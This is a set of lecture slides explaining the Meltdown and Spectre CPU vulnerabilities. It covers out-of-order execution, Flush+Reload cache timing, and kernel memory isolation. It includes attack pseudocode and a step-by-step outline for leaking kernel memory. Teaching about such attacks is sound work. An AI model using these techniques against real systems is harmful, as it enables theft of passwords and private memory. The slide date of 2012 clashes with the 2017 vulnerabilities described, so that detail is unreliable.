## Meltdown & Spectre

MonKey Lee

Ruilin Wen

2012-04

## Skylake Microarchitecture (from mdsattacks.com)



Skylake Microarchitecture (from mdsattacks.com)



## Out-of-order Processor & Speculations (1)

- Out-of-order Execution
  - Tomasulo (CPU) & Scoreboarding (GPU)
  - Maximizing the utilization of all execution units of a CPU core as exhaustive as possible
- Tomasulo



图 1.14 乱序执行的超标量处理器的流水线

## Out-of-order Processor & Speculations (2)

#### Instructions are

- fetched and decoded in the front-end
- · dispatched to the backend
- processed by individual execution units

#### Instructions

- are executed out-of-order
- wait until their dependencies are ready
  - Later instructions might execute prior earlier instructions
- retire in-order
  - State becomes architecturally visible
- Exceptions are checked during retirement
  - Flush pipeline and recover state



## Out-of-order Processor & Speculations (3)

- To keep the execution part busy, we need:
- Speculations
  - Control-flow speculation
    - Branch Taken/Not-taken
    - Branch Target
    - Delayed Exception Handling
  - Data-flow speculation
    - Predict a value for the program to carry on
    - (AMD Predictive Store Forwarding)



- Ideally, mis-predicted are withdrawn later
  - But it has FLAWS.

## Spectre and Meltdown Variants



Flush + Reload Attack



### Side-channel Attack

- Safe software infrastructure does not mean safe execution
- Information leaks because of the underlying hardware
- Exploit unintentional information leakage by side-effects















- It's possible to explicitly flush a cache line
  - CLFLUSH
- Same for measure the access latency
  - RDTSC / RDTSCP
- Non-privileged operations

## Code Example

```
void victim(char buf*) {
    // assume secret = 84
    load &buf[secret * 4096];
}
```

#### Flush+Reload over all pages of the array



#### Why 4096 here?

```
int attack() {
    char *buf = malloc(1024 * 4096);
    for (int i = 0; i < 1024 * 4096; i += 64)
        clflush(buf + i);
    victim(buf);
    for (int i = 0; i < 1024 * 4096; i += 4096) {
        int64_t start = rdtsc();
        load &buf[i];
        int64 t end = rdtsc();
        if (end - start < THRESHOLD)</pre>
            return i; // i is the secret
```

## Summary of Hardware Side-channel

- Stateful Attack (e.g. Cache)
  - (the Attacker) restore shared resource to a known state
  - (the Victim) execute and change the state
  - (the Attacker) checks the state of the shared resource again to learn secrets about the victim's execution
- Stateless Attack (not included in this talk, see LOTR paper)
  - passively monitors the latency to access the shared resource and uses variations in this latency to infer secrets about the victim's execution
  - e.g. in LOTR:
  - Ringbus contention stands for "1", and no contention for "0"
  - Author claims: 4Mbps leak speed, possible to leak private key from crypto routine

# Meltdown

CVE-2017-5754



## Overview

#### the authors claim...

- Meltdown exploits <u>side effects of out-of-order execution</u> on modern processors.
- Meltdown breaks all security guarantees provided by <u>address</u> space isolation.
- Meltdown can …
  - read arbitrary kernel-memory locations including personal data and passwords.
  - read memory of other processes or virtual machines in the cloud without any permissions or privileges.

### Outline

Memory Layout & Isolation of an OS

- Side-channel of Cache
  - Flush + Reload Attack

- Out-of-order Processor & Speculations
- Building the Attack

## Memory Isolation of an OS (1)

Kernel Addresses Non-canonical Addresses **User Addresses** 



Applications

• Find something human readable, e.g., the Linux version

# sudo grep linux\_banner /proc/kallsyms fffffffff81a000e0 R linux\_banner

- Kernel is isolated from user space
- This isolation is a combination of hardware and software
- User applications cannot access anything from the kernel

## Memory Isolation of an OS (2)

Page Table



## Memory Isolation of an OS (3)

- CPU support virtual address spaces to isolate processes
- Physical memory is organized in page frames
- Virtual memory pages are mapped to page frames using page tables



User/Supervisor bit defines in which privilege level the page can be accessed

## Memory Layout of an OS



- In the past...
- For performance reason, memory reserved for kernel is mapped into each processes' virtual space.

## Answer: Why this won't work? (ideally)

```
char data = *(char*) 0xfffffffff81a000e0;
printf("%c\n", data);
```

- We try to load an inaccessible address
- Permission is checked

## Building the attack Toy Example

```
*(volatile char*) 0; // raise_exception();
array[84 * 4096] = 0;
```

Flush+Reload over all pages of the array



- "Unreachable" code line was actually executed
- Exception was only thrown afterwards

# Building the Attack The blueprint

- Out-of-order instructions leave microarchitectural traces
  - We can see them for example in the cache
- Give such instructions a name: transient instructions
- We can indirectly observe the execution of transient instructions



## Building the Attack Crash handling

- Transient instructions are executed all the time
- Loading inaccessible addresses leads to a crash (segfault)
- How to prevent the crash?







## To sum up, Meltdown Attack is ...

- 1. Flush the array
- User program read a kernel-side virtual address to a register secret\_to\_be\_leaked
- 3. Before exception being actually handled by hardware, use a follow-up memory access to **array** to memorize the **secret\_to\_be\_leaked**
- 4. Exception handled by hardware
  - Prevent crash by:
  - POSIX signal handler (SIGSEGV)
  - or Intel TSX (another advanced hardware feature)
- 5. Use Flush + Reload to recover **secret\_to\_be\_leaked**



- Index of cache hit reveals data
- Permission check is in some cases not fast enough



# Spectre CVE-2017-5753

CVE-2017-5715



## To Recap: Skylake Microarchitecture (from mdsattacks.com)



## Variants

\* Variant 1: Bounds Checking Bypass

Variant 2: Branch Target Injection

## (Open with right-click)



## Spectre Attacks: Exploiting Speculative Execution

IEEE Security & Privacy (May 20, 2019)

Paul Kocher<sup>1</sup>, Jann Horn<sup>2</sup>, Anders Fogh<sup>3</sup>, Daniel Genkin<sup>4</sup>, Daniel Gruss<sup>5</sup>, Werner Haas<sup>6</sup>, Mike Hamburg<sup>7</sup>, Mortiz Lipp<sup>5</sup>, Stefan Mangard<sup>5</sup>, Thomas Prescher<sup>6</sup>, Michael Schwartz<sup>5</sup>, Yuval Yarom<sup>8</sup>

<sup>1</sup> Independent, <sup>2</sup> Google Project Zero, <sup>3</sup> G DATA Advanced Analytics, <sup>4</sup> University of Pennsylvania and University of Maryland,

<sup>5</sup> Graz University of Technology, <sup>6</sup> Cyberus Technology, <sup>7</sup> Rambus, Cryptography Research Division, <sup>8</sup> University of Adelaide & Data61

All trademarks are the property of their respective owners. This presentation is provided without any guarantee or warranty whatsoever.